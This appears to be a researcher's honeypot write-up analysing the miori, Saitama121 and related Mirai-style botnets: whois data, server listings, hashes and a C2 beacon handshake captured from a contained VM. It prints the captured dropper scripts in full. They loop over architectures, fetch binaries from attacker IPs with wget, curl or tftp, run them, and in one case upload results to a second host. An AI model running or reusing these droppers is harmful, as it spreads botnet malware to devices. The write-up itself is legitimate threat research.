Ukrainian Honeypot ::005:: miori // Saitama121 // TropicalV1 Network Analysis

Last Updated

Sat Sep 17 23:02:38 2022

See Also

(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there's a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)

https://bcable.net/analysis-ukr-prelim.html

https://bcable.net/analysis-ukr-graphs.html

https://bcable.net/analysis-ukr-indicators.html

https://bcable.net/analysis-ukr-ru_map_sessions.html

https://bcable.net/analysis-ukr-cn_map_sessions.html

https://bcable.net/analysis-ukr-miori_fail.html

https://bcable.net/analysis-ukr-botnet_perl.html

https://bcable.net/analysis-ukr-ddos_gh0st.html

https://bcable.net/analysis-ukr-indicators_2023.html

https://bcable.net/analysis-ukr-crew_001.html

https://bcable.net/analysis-ukr-inventory_attack.html

https://bcable.net/analysis-ukr-crew_002.html

Libraries

library(ggplot2)
library(Rwhois)
library(Rrdap)
library(rgeolocate)
source("shared/country_code_cleanup.R")
source("shared/geoip.R")
source("shared/world_mapper.R")

Background Data and Network Analysis

miori // 46.19.137.50:55566

185.28.38.119

your device just got infected to a bootnoot
inetnum:        185.28.38.0 - 185.28.38.127
netname:        PROHOSTIE-INFRA-NL38
country:        NL
admin-c:        TECH12-RIPE
tech-c:         TECH12-RIPE
status:         LIR-PARTITIONED PA
mnt-by:         TG32354-MNT
created:        2020-10-08T13:11:40Z
last-modified:  2020-10-08T13:11:40Z
source:         RIPE

person:         Timothy Gratton
address:        Prohost Limited
address:        Moonhill Cottage Drumnagah
address:        V95 K2 N6  Inagh
address:        Ireland
phone:          + 353656715207
nic-hdl:        TECH12-RIPE
mnt-by:         TG32354-MNT
created:        2013-06-07T12:29:29Z
last-modified:  2018-05-29T16:20:28Z
source:         RIPE # Filtered
$ curl -i http://185.28.39.119/
HTTP/1.1 200 OK
Date: Wed, 04 May 2022 02:03:21 GMT
Server: Apache/2.4.48 (Ubuntu)
Last-Modified: Mon, 25 Apr 2022 03:17:47 GMT
ETag: "2aa6-5dd72053d1a55"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html

Default Ubuntu Welcome page for Apache.

$ sha256sum redacted/malware/185.28.39.119/*
4b0bb60b015ffea0472cbdc6913e5b6ae37bbc0a8c1d45eebab3e3f888d6e657  redacted/malware/185.28.39.119/miori.arm
7ad49f8e0a3ec454894bf16ed2991f15bd3a942086da00a7821d507e5d5cf0b3  redacted/malware/185.28.39.119/miori.arm5
7ad49f8e0a3ec454894bf16ed2991f15bd3a942086da00a7821d507e5d5cf0b3  redacted/malware/185.28.39.119/miori.arm6
d15dbe156eec5e349b1a636bb265cdbd559e2f4794f80e854f6081ddb39169bc  redacted/malware/185.28.39.119/miori.arm7
ee7a78c2a86f1e69ee0e4db252a0667973e59ea9324453a119014019682d6b26  redacted/malware/185.28.39.119/miori.mips
6509b8454664bdd5f72bcf41a95db928850892dd039abf427bf6119336fbdaf3  redacted/malware/185.28.39.119/miori.mpsl
a6fe6bcd3b826f95f93cb8643f6436dcfcae95f3fb5fda611695a1156dc1af0e  redacted/malware/185.28.39.119/miori.ppc
24f18dc607531367fb050c98874a210a02cdeeffb056799a15cccebcff4bc76c  redacted/malware/185.28.39.119/miori.sh4
ad6b282ebdb377800098229b8a10c9c5bcad4eb065c8e40e92ce677379b4dac5  redacted/malware/185.28.39.119/miori.x86
f03d281504447f7a20d36406c6aad7dac59d0fc1a1222a7838aca1b70e9f8604  redacted/malware/185.28.39.119/sh

sh

binarys="mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc"
server_ip="185.28.39.119"
binname="miori"

for arch in $binarys
do
wget http://$server_ip/$binname.$arch || curl -O http://$server_ip/$binname.$arch || tftp $server_ip -c get $binname.$arch || tftp -g -r $binname.$arch $server_ip
chmod 777 $binname.$arch
./$binname.$arch $1.$arch
rm -rf $binname.$arch
done

37.0.11.168

Inside the binaries:

your device just got infected to a bootnoot
inetnum:        37.0.8.0 - 37.0.11.255
netname:        SERVER-37-0-8-0
country:        NL
org:            ORG-SB656-RIPE
admin-c:        SBAH20-RIPE
tech-c:         SBAH20-RIPE
status:         ASSIGNED PA
mnt-by:         PREFIXBROKER-MNT
created:        2021-03-04T10:30:18Z
last-modified:  2021-03-04T10:30:18Z
source:         RIPE

organisation:   ORG-SB656-RIPE
org-name:       Serverion BV
org-type:       OTHER
address:        Krammer 8
address:        3232HE Brielle
address:        Netherlands
abuse-c:        SBAH20-RIPE
mnt-ref:        PREFIXBROKER-MNT
mnt-by:         PREFIXBROKER-MNT
created:        2021-03-04T10:30:18Z
last-modified:  2021-03-04T10:30:18Z
source:         RIPE # Filtered
$ curl -i http://37.0.11.168
HTTP/1.1 200 OK
Date: Thu, 05 May 2022 17:53:44 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 16 Apr 2022 13:58:42 GMT
ETag: "2aa6-5dcc5ecc884dd"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html

Default Ubuntu Welcome page for Apache again.

$ sha256sum redacted/malware/37.0.11.168/*
4b0bb60b015ffea0472cbdc6913e5b6ae37bbc0a8c1d45eebab3e3f888d6e657  redacted/malware/37.0.11.168/miori.arm
7ad49f8e0a3ec454894bf16ed2991f15bd3a942086da00a7821d507e5d5cf0b3  redacted/malware/37.0.11.168/miori.arm5
7ad49f8e0a3ec454894bf16ed2991f15bd3a942086da00a7821d507e5d5cf0b3  redacted/malware/37.0.11.168/miori.arm6
d15dbe156eec5e349b1a636bb265cdbd559e2f4794f80e854f6081ddb39169bc  redacted/malware/37.0.11.168/miori.arm7
ee7a78c2a86f1e69ee0e4db252a0667973e59ea9324453a119014019682d6b26  redacted/malware/37.0.11.168/miori.mips
6509b8454664bdd5f72bcf41a95db928850892dd039abf427bf6119336fbdaf3  redacted/malware/37.0.11.168/miori.mpsl
a6fe6bcd3b826f95f93cb8643f6436dcfcae95f3fb5fda611695a1156dc1af0e  redacted/malware/37.0.11.168/miori.ppc
24f18dc607531367fb050c98874a210a02cdeeffb056799a15cccebcff4bc76c  redacted/malware/37.0.11.168/miori.sh4
ad6b282ebdb377800098229b8a10c9c5bcad4eb065c8e40e92ce677379b4dac5  redacted/malware/37.0.11.168/miori.x86
bdcb3fe159a00c19682c86463d35ddbf26d43597c340ae340ddb79a6e6b1ac2d  redacted/malware/37.0.11.168/sh

sh

Similar script to previous one:

binarys="mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc"
server_ip="37.0.11.168"
binname="miori"

for arch in $binarys
do
wget http://$server_ip/$binname.$arch || curl -O http://$server_ip/$binname.$arch || tftp $server_ip -c get $binname.$arch || tftp -g -r $binname.$arch $server_ip
chmod 777 $binname.$arch
./$binname.$arch $1.$arch
rm -rf $binname.$arch
done

179.43.156.214

your device just got infected to a bootnoot
inetnum:     179.43.128.0/18
status:      allocated
aut-num:     N/A
owner:       PRIVATE LAYER INC
ownerid:     PA-PLIN-LACNIC
responsible: Milciades Garcia
address:     Torres De Las Americas, Torre C, 0, Suite 1404, Floor 14
address:     00000 - Panama -
country:     PA
phone:       +41 43 5082295
owner-c:     MIG23
tech-c:      MIG23
abuse-c:     MIG23
inetrev:     179.43.128.0/24
nserver:     DNS01.PRIVATELAYER.COM
nsstat:      20220527 AA
nslastaa:    20220527
nserver:     DNS02.PRIVATELAYER.COM
nsstat:      20220527 AA
nslastaa:    20220527
inetrev:     179.43.129.0/24
$ curl -i http://179.43.156.214
HTTP/1.1 200 OK
Date: Fri, 27 May 2022 08:45:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 18 May 2022 06:34:52 GMT
ETag: "2aa6-5df4374695b6c"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html

Default Ubuntu Welcome page for Apache again.

$ sha256sum redacted/malware/179.43.156.214/*
f39119f6193fb4c9b9ec44b805913c153b8f78bbf04c39b6cc71e62380f37f83  redacted/malware/179.43.156.214/c.sh
de3e8caee958dde0ef6c1fb1a60f1f39a59af77a436868e074537e9d9520adfb  redacted/malware/179.43.156.214/miori.arc
2e633547fec21a3e50fc9ecdca4d1d444e109dae7d091392889437c518aff35f  redacted/malware/179.43.156.214/miori.arm
8ae0fe14bdc98530ed82a564dadf0b93f38d3ab3b15fad3c6db602a29a0404a2  redacted/malware/179.43.156.214/miori.arm5
0391a198ce1f1e62453a485cf5838e12299c4c653c8eddac8cbed61885886491  redacted/malware/179.43.156.214/miori.arm6
0391a198ce1f1e62453a485cf5838e12299c4c653c8eddac8cbed61885886491  redacted/malware/179.43.156.214/miori.arm7
69e7fd2ca9ae406495256d602e08fba0fd2d84ff2da4247d0fc5ae229b63fe35  redacted/malware/179.43.156.214/miori.i5
819b5c3f6c5db4f3aa44da5361dd834639628cf8f423735937c856872cae9c5e  redacted/malware/179.43.156.214/miori.i6
24e9f89bca2c8750ce05f4bc8bb27607528a60fc28aefc3ebe9e2cc97cb6abe0  redacted/malware/179.43.156.214/miori.m68k
16a97a7944c74fc0dda11f5593ec0f26661c8ec14d3ba08d1a950433aa68f16a  redacted/malware/179.43.156.214/miori.mips
20088d86376536f8f3b3a2fa4ed7627a5f279328897f786c565c553170c9a805  redacted/malware/179.43.156.214/miori.mpsl
12809c91400833d71acd30c381a23cad340cbf51a3e92a1150c3b494d599efd2  redacted/malware/179.43.156.214/miori.ppc
b40a9f4a0f3f1a9647f4c8e9a2569c53d6bb76963d7c0cd7369a053e45c25d04  redacted/malware/179.43.156.214/miori.sh4
58220a864dcdb5d26d590c0ccdb37be044ac9abb4b592befa82660bd4464c474  redacted/malware/179.43.156.214/miori.spc
cf08da6870c9ae3b09cc45a3ba75d35fc89c772157c09131d97f8ba3b08e3562  redacted/malware/179.43.156.214/miori.x86
34c15160e0e684a7bb5f97957e482e36c9d1a7f5b23b27b89b0cdd710896e4fe  redacted/malware/179.43.156.214/sh
8770abb8e430cfeeddf0df483b21b3f2ea6028cc8fd32da8e991dc27729589b8  redacted/malware/179.43.156.214/w.sh

c.sh

curl http://46.19.137.50/sh; chmod 777 sh; ./sh android

rm $0

sh

binarys="mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc arc spc i5 i6 m68k"
server_ip="179.43.156.214"
binname="miori"

for arch in $binarys
do
rm -rf $binname.$arch
wget http://$server_ip/$binname.$arch || curl -O http://$server_ip/$binname.$arch || tftp $server_ip -c get $binname.$arch || tftp -g -r $binname.$arch $server_ip
chmod 777 $binname.$arch
./$binname.$arch $1.$arch
rm -rf $binname.$arch
done

w.sh

busybox wget http://46.19.137.50/sh; chmod 777 sh; ./sh android

rm $0

46.19.137.50:55566

your device just got infected to a bootnoot
$ curl -i http://46.19.137.50
curl -i http://46.19.137.50
HTTP/1.1 200 OK
Date: Fri, 27 May 2022 08:46:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 4099
Content-Type: text/html;charset=UTF-8
                                    Index of /

[ICO]    Name     Last modified   Size Description
══════════════════════════════════════════════════
[TXT] c.sh       2022-05-25 12:31   64  
[DIR] gaybub/    2022-05-25 12:33    -  
[   ] miori.arc  2022-05-26 14:05 114K  
[   ] miori.arm  2022-05-26 14:05  37K  
[   ] miori.arm5 2022-05-26 14:05  37K  
[   ] miori.arm6 2022-05-26 14:05  86K  
[   ] miori.arm7 2022-05-26 14:05  86K  
[   ] miori.i5   2022-05-26 14:05  30K  
[   ] miori.i6   2022-05-26 14:05  31K  
[   ] miori.m68k 2022-05-26 14:05  35K  
[   ] miori.mips 2022-05-26 14:05  48K  
[   ] miori.mpsl 2022-05-26 14:05  50K  
[   ] miori.ppc  2022-05-26 14:05  33K  
[   ] miori.sh4  2022-05-26 14:05  30K  
[   ] miori.spc  2022-05-26 14:05  39K  
[   ] miori.x86  2022-05-26 14:05  37K  
[   ] sh         2022-05-25 12:08  399  
[TXT] w.sh       2022-05-25 12:32   72  
══════════════════════════════════════════════════

 Apache/2.4.41 (Ubuntu) Server at 46.19.137.50 Port 80
                       Index of /gaybub

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[TXT]       c.sh             2022-05-25 12:33   64  
[   ]       miori.arc        2022-05-26 14:05 114K  
[   ]       miori.arm        2022-05-26 14:05  37K  
[   ]       miori.arm5       2022-05-26 14:05  37K  
[   ]       miori.arm6       2022-05-26 14:05  86K  
[   ]       miori.arm7       2022-05-26 14:05  86K  
[   ]       miori.i5         2022-05-26 14:05  30K  
[   ]       miori.i6         2022-05-26 14:05  31K  
[   ]       miori.m68k       2022-05-26 14:05  35K  
[   ]       miori.mips       2022-05-26 14:05  48K  
[   ]       miori.mpsl       2022-05-26 14:05  50K  
[   ]       miori.ppc        2022-05-26 14:05  33K  
[   ]       miori.sh4        2022-05-26 14:05  30K  
[   ]       miori.spc        2022-05-26 14:05  39K  
[   ]       miori.x86        2022-05-26 14:05  37K  
[   ]       sh               2022-05-25 12:09  399  
[TXT]       w.sh             2022-05-25 12:33   72  
══════════════════════════════════════════════════════════════

 Apache/2.4.41 (Ubuntu) Server at 46.19.137.50 Port 80
$ sha256sum redacted/malware/46.19.137.50/*
de3e8caee958dde0ef6c1fb1a60f1f39a59af77a436868e074537e9d9520adfb  redacted/malware/46.19.137.50/miori.arc
2e633547fec21a3e50fc9ecdca4d1d444e109dae7d091392889437c518aff35f  redacted/malware/46.19.137.50/miori.arm
8ae0fe14bdc98530ed82a564dadf0b93f38d3ab3b15fad3c6db602a29a0404a2  redacted/malware/46.19.137.50/miori.arm5
0391a198ce1f1e62453a485cf5838e12299c4c653c8eddac8cbed61885886491  redacted/malware/46.19.137.50/miori.arm6
0391a198ce1f1e62453a485cf5838e12299c4c653c8eddac8cbed61885886491  redacted/malware/46.19.137.50/miori.arm7
69e7fd2ca9ae406495256d602e08fba0fd2d84ff2da4247d0fc5ae229b63fe35  redacted/malware/46.19.137.50/miori.i5
819b5c3f6c5db4f3aa44da5361dd834639628cf8f423735937c856872cae9c5e  redacted/malware/46.19.137.50/miori.i6
24e9f89bca2c8750ce05f4bc8bb27607528a60fc28aefc3ebe9e2cc97cb6abe0  redacted/malware/46.19.137.50/miori.m68k
16a97a7944c74fc0dda11f5593ec0f26661c8ec14d3ba08d1a950433aa68f16a  redacted/malware/46.19.137.50/miori.mips
20088d86376536f8f3b3a2fa4ed7627a5f279328897f786c565c553170c9a805  redacted/malware/46.19.137.50/miori.mpsl
12809c91400833d71acd30c381a23cad340cbf51a3e92a1150c3b494d599efd2  redacted/malware/46.19.137.50/miori.ppc
b40a9f4a0f3f1a9647f4c8e9a2569c53d6bb76963d7c0cd7369a053e45c25d04  redacted/malware/46.19.137.50/miori.sh4
58220a864dcdb5d26d590c0ccdb37be044ac9abb4b592befa82660bd4464c474  redacted/malware/46.19.137.50/miori.spc
cf08da6870c9ae3b09cc45a3ba75d35fc89c772157c09131d97f8ba3b08e3562  redacted/malware/46.19.137.50/miori.x86
f5d4d06f6ebdbeb26e7c6b274c1af7cf4fcf9f6d3cd2d7d08200593e1c632531  redacted/malware/46.19.137.50/sh

Seems to be the exact same code, except sh:

sh

binarys="mips mpsl x86 arm7 arm sh4 arm6 arm5 ppc arc spc i5 i6 m68k"
server_ip="46.19.137.50"
binname="miori"

for arch in $binarys
do
rm -rf $binname.$arch
wget http://$server_ip/$binname.$arch || curl -O http://$server_ip/$binname.$arch || tftp $server_ip -c get $binname.$arch || tftp -g -r $binname.$arch $server_ip
chmod 777 $binname.$arch
./$binname.$arch $1.$arch
rm -rf $binname.$arch
done

Just a different server_ip variable.

Saitama121 // 2.56.59.196:7777

Infected By Cult
Self Rep Fucking NeTiS and Thisity 0n Ur FuCkInG FoReHeAd We BiG L33T HaxErS
inetnum:        2.56.58.0 - 2.56.59.255
netname:        SERVER-2-56-58-0
country:        NL
org:            ORG-SB666-RIPE
admin-c:        SBAH21-RIPE
tech-c:         SBAH21-RIPE
status:         ASSIGNED PA
mnt-by:         PREFIXBROKER-MNT
created:        2021-05-03T18:09:59Z
last-modified:  2021-05-03T18:09:59Z
source:         RIPE

organisation:   ORG-SB666-RIPE
org-name:       Serverion BV
org-type:       OTHER
address:        Krammer 8
address:        3232HE Brielle
address:        Netherlands
abuse-c:        SBAH21-RIPE
mnt-ref:        PREFIXBROKER-MNT
mnt-by:         PREFIXBROKER-MNT
created:        2021-05-03T18:09:58Z
last-modified:  2021-05-03T18:09:58Z
source:         RIPE # Filtered
$ curl -i http://2.56.59.196/
HTTP/1.1 200 OK
Date: Thu, 26 May 2022 17:32:24 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Sat, 21 May 2022 02:27:59 GMT
ETag: "0-5df7c5b033771"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://2.56.59.196/bins/
HTTP/1.1 200 OK
Date: Thu, 26 May 2022 17:31:27 GMT
Server: Apache/2.4.6 (CentOS)
Content-Length: 3075
Content-Type: text/html;charset=ISO-8859-1
                                     Index of /bins

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       Saitama121.arm   2022-05-18 21:25  77K  
[   ]       Saitama121.arm5  2022-05-18 21:25  57K  
[   ]       Saitama121.arm6  2022-05-18 21:25  85K  
[   ]       Saitama121.arm7  2022-05-18 21:25 150K  
[   ]       Saitama121.m68k  2022-05-18 21:25  74K  
[   ]       Saitama121.mips  2022-05-18 21:25  95K  
[   ]       Saitama121.mpsl  2022-05-18 21:25  99K  
[   ]       Saitama121.ppc   2022-05-18 21:25  73K  
[   ]       Saitama121.sh4   2022-05-18 21:25  69K  
[   ]       Saitama121.spc   2022-05-18 21:25  78K  
[   ]       Saitama121.x86   2022-05-18 21:25  67K  
══════════════════════════════════════════════════════════════

Unnamed // 45.95.55.27:32774

inetnum:        45.95.55.0 - 45.95.55.127
netname:        DE-FLYHOSTING
country:        DE
admin-c:        TP7252-RIPE
org:            ORG-FA1202-RIPE
tech-c:         TP7252-RIPE
abuse-c:        ACRO47362-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-LUMASERV
created:        2022-03-27T17:10:19Z
last-modified:  2022-05-28T13:54:54Z
source:         RIPE

organisation:   ORG-FA1202-RIPE
org-name:       Fly-Hosting
org-type:       OTHER
address:        Alte Heerstrasse 13
address:        38518 Gifhorn
abuse-c:        ACRO47362-RIPE
mnt-ref:        MNT-LUMASERV
mnt-by:         MNT-LUMASERV
mnt-by:         MNT-LUMASERV
created:        2022-05-28T13:54:34Z
last-modified:  2022-05-28T13:54:34Z
source:         RIPE # Filtered

person:         Timon Prilop
address:        Alte Heerstrasse 13
address:        38518 Gifhorn
phone:          +49000000000
nic-hdl:        TP7252-RIPE
mnt-by:         MNT-LUMASERV
mnt-by:         MNT-LUMASERV
created:        2022-03-27T17:08:37Z
last-modified:  2022-03-27T17:08:37Z
source:         RIPE
$ curl -i http://45.95.55.27/
HTTP/1.1 200 OK
Date: Sun, 05 Jun 2022 18:52:37 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 02 Jun 2022 17:59:45 GMT
ETag: "24c-5e07ac558643a"
Accept-Ranges: bytes
Content-Length: 588
Content-Type: text/html; charset=UTF-8

rm -rf a3; curl http://45.95.55.27/bins/arm7 > a3; chmod 777 a3; ./a3 dlink > a; curl -XPUT 45.95.55.50:9832 -T a;

rm -rf a2; curl http://45.95.55.27/bins/arm5 > a2; chmod 777 a2; ./a2 dlink > b; curl -XPUT 45.95.55.50:9832 -T b;

rm -rf a1; curl http://45.95.55.27/bins/arm > a1; chmod 777 a1; ./a1 dlink > c; curl -XPUT 45.95.55.50:9832 -T c;

rm -rf a6; curl http://45.95.55.27/bins/mips > a6; chmod 777 a6; ./a6 dlink > d; curl -XPUT 45.95.55.50:9832 -T d;

rm -rf a9; curl http://45.95.55.27/bins/mipsl > a9; chmod 777 a9; ./a9 dlink > e; curl -XPUT 45.95.55.50:9832 -T e;
                                     Index of /bins

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       arc              2022-06-05 11:22  49K  
[   ]       arm              2022-06-05 11:22  83K  
[   ]       arm5             2022-06-05 11:22  57K  
[   ]       arm6             2022-06-05 11:22  93K  
[   ]       arm7             2022-06-05 11:22 163K  
[   ]       m68k             2022-06-05 11:22  82K  
[   ]       mips             2022-06-05 11:22  74K  
[   ]       mpsl             2022-06-05 11:22 103K  
[   ]       ppc              2022-06-05 11:22  77K  
[   ]       sh4              2022-06-05 11:22  73K  
[   ]       spc              2022-06-05 11:22  84K  
[   ]       x86              2022-06-05 11:22  73K  
══════════════════════════════════════════════════════════════
wget -U "%s" %s -q --spider
POST /cdn-cgi/
 HTTP/1.1
User-Agent:
Host:
Cookie:
http
url=
POST
HAIL
THE WGET FLOOD
cats on top <3 nya~!

Analysis

The initial connection attempts on infection are just to blast various ports on port 23 and 2323, but there's one 55566 that sticks out which turns out is the beacon server.

Strategy

The strategy here is to have a contained, non-internet connected VM infected and firewalled where I can monitor the outgoing connection attempts, simulate the server internally, and then manually attempt those connections on the real server.

Initial Connections

The firewall hits that were contained can be analyzed through digging with grep and converting to CSV. The collection is specific to my environment, but basically it's just IPTables with a “–log-prefix” of “DROP-CONTAINED-XX.YY: ” that has some IP information, then there is a DROP rule immediately after for it. This is through libvirt/qemu-kvm.

Searching the logs for connection attempts, sorting gives the highest connection point and results in an easy standout IP/port:

$ cat contained_miori.txt | sed -r "s/^.*DST=([^ ]+) .* DPT=([^ ]+) .*$/\1:\2/g" | sort | uniq -c | sort -g | tail
  2 8.253.72.172:23
  2 83.101.19.29:23
  2 85.20.215.115:23
  2 8.77.93.33:23
  2 92.167.182.16:23
  2 96.49.223.169:23
  2 97.174.66.213:23
  2 98.123.59.18:23
  3 231.143.205.226:23
 75 46.19.137.50:55566

Initial Break-In Attempts, Loud Recon

(REMOTE BEACON)

05:58 -!- Irssi: Looking up 46.19.137.50
05:58 -!- Irssi: Connecting to 46.19.137.50 [46.19.137.50] port 55566
05:58 -!- Irssi: Connection to 46.19.137.50 established
05:58 -!- [?1049h��A����"ユーザー名: NICK mfu7454
05:58 -!- パスワード: *****************************************
05:58 -!- Mチェックイン情報... -Mチェックイン情報... \Mチェックイン情報...
          |Mチェックイン情報... /Mチェックイン情報... -Mチェックイン情報...
          \Mチェックイン情報... |Mチェックイン情報... /Mチェックイン情報...
          -Mチェックイン情報... \Mチェックイン情報... |Mチェックイン情報...
          /Mチェックイン情報... -Mチェックイン情報... \Mチェックイン情報... |M[-]INVALAD
          LOGIN[-]

IRC connection tcpdump'd:

# tcpdump -s 0 -i any -w miori.dump tcp port 55566

(REMOTE BEACON)

CAP LS
NICK mfu7454
USER mfu1243 mfu1243 46.19.137.50 :mfu729
.[?1049h........".[1;35m....[1;37m....[1;35m....[1;37m....[1;35m....[1;36m: .[0mNICK mfu7454
.[1;35m....[1;37m....[1;35m....[1;37m....[1;35m....[1;36m: .[0m*****************************************


.[37;1m........................... .[31m-
.[37;1m........................... .[31m\
.[37;1m........................... .[31m|
.[37;1m........................... .[31m/
.[37;1m........................... .[31m-
.[37;1m........................... .[31m\
.[37;1m........................... .[31m|
.[37;1m........................... .[31m/
.[37;1m........................... .[31m-
.[37;1m........................... .[31m\
.[37;1m........................... .[31m|
.[37;1m........................... .[31m/
.[37;1m........................... .[31m-
.[37;1m........................... .[31m\
.[37;1m........................... .[31m|
.[1;37m[-]INVALAD LOGIN[-]
.[1;37m[-]press any key to exit[-].[0m.[?1049l

Notice all of the terminal color codes (IE: “.[37;1m”, etc). This shows up as purple and blue and a few other colors when interpreted on a Linux ptty. Not IRC, yet again got the wrong protocol, oops.

Routing the specific traffic I need to localhost running a listening logging netcat server.

(CONTAINED VM)

# iptables -t nat -A OUTPUT -d 46.19.137.50 -j DNAT --to-destination 127.0.0.1
# nc -l -p 55566 -o hexout.txt

Header of the malware client that sends to the remote server.

(CONTAINED VM)

< 00000000 03 00 02 01 00                                  # .....
< 00000005 00 00                                           # ..
< 00000007 00 00                                           # ..
< 00000009 00 00                                           # ..
< 0000000b 00 00                                           # ..
< 0000000d 00 00                                           # ..
< 0000000f 00 00                                           # ..

Each of the two null characters were outputting once every minute. Using this, I put some of this data into the client.py and server.py pseudo clients I have at the bottom of this page. This is kind of being used as a disjoint middle-man low(ish) socket-server.

Output from beacon server from python client.py:

(REMOTE BEACON)

SEND DATA: b'\x03\x00\x02\x01\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\n\x1b[1;35m\xe3\x83\x91\x1b[1;37m\xe3\x82\xb9\x1b[1;35m\xe3\x83\xaf\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x83\x89\x1b[1;36m: \x1b[0m\r\n\r\n\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[1;37m[-]INVALAD LOGIN[-]\r\n\x1b[1;37m[-]press any key to exit[-]\x1b[0m', None)
SEND PING: b'\x00\x00'

Text representation:

(REMOTE BEACON)

������"ユーザー名:
パスワード:

[-]INVALAD LOGIN[-] |
[-]press any key to exit[-]%

So, no dice. After passing this back to the client, I noticed the malware actually passes a single \x00 initially, not a double. I wonder if this will change things…

(REMOTE BEACON)

SEND DATA: b'\x03\x00\x02\x01\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND DATA: b'\x00'
RESPONSE: (b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\n\x1b[1;35m\xe3\x83\x91\x1b[1;37m\xe3\x82\xb9\x1b[1;35m\xe3\x83\xaf\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x83\x89\x1b[1;36m: \x1b[0m', None)
SEND PING: b'\x00\x00'
